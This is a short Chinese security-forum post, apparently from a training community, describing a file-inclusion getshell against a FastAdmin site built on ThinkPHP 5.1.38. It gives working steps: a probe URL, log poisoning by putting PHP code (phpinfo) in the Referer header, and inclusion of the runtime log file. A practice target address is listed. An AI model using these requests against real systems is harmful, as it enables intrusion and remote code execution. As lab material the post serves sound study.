【刷单商城】某处Fastadmin 文件包含Getshell-思路分享社区-Web安全-赤道学院

【刷单商城】某处Fastadmin 文件包含Getshell

环境说明

  1. 框架结构:Thinkphp5.1.38TS
  2. 容器版本:Nginx
  3. 脚本解析器版本:PHP5.6

** 第一步:判断是否存在 **

访问:

/?s=index/user/_empty?name=.1

然后出现:

Image description

代表漏洞存在,直接跳转走了得,都不算。报错500应该都可以。

** 第二步:写入执行代码 **

  1. 请求主网站,更改Referer

Referer: <?php phpinfo(); ?>

Image description

** 第三步:包含执行代码 **

/?s=index/user/_empty?name=../runtime/log/single.log

Image description

靶场地址

http://9004.zcbug.com

请登录后发表评论

    没有回复内容